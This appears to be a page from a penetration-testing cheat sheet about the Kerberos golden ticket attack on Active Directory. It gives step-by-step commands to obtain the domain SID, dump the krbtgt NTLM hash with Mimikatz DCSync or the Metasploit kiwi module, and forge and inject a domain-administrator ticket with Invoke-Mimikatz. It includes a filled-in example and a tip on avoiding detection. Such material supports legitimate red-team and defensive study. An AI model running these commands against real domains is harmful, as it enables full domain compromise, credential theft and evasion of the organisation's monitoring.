Golden ticket

A golden ticket is a forged TGT created with a stolen KDC key. A golden ticket enables the attacker to create a fake domain administrator identity to gain access to any service on a domain.

The KDC automatically trusts a TGT that is encrypted with a KDC key.

Information needed to create a golden ticket

Domain Name
Domain SID
Username to impersonate
krbtgt NTLM hash

Obtaining the domain information and sid

With PowerView

Get-DomainSID

With domain user account

whoami /user

Obtaining krbtgt hash

Using Mimikatz

The DCSync is a mimikatz feature which will try to impersonate a domain controller and request account password information from the targeted domain controller. This technique is less noisy as it doesn’t require direct access to the domain controller or retrieving the NTDS.DIT file over the network.

lsadump::dcsync /user:krbtgt

Metasploit kiwi module

dcsync_ntlm krbtgt

Generating a golden ticket

It's important to note down the domain kerberos policy to avoid detection

Invoke-Mimikatz -Command '"kerberos::golden /user:[impersonating user] /domain:[domain] /sid:[domain sid] /krbtgt:[krbtgt hash] /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:msp.local /sid:S-1-5-21-2998733414-582960673-4099777928 /krbtgt:aae39b0f0f043e3a7eefc88a13560c80 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

PreviousKerberos attacks NextSilver ticket

Last updated 3 years ago

hashtagInformation needed to create a golden ticket

hashtagObtaining the domain information and sid

hashtagWith PowerView

hashtagWith domain user account

hashtagObtaining krbtgt hash

hashtagUsing Mimikatz

hashtagMetasploit kiwi module

hashtagGenerating a golden ticket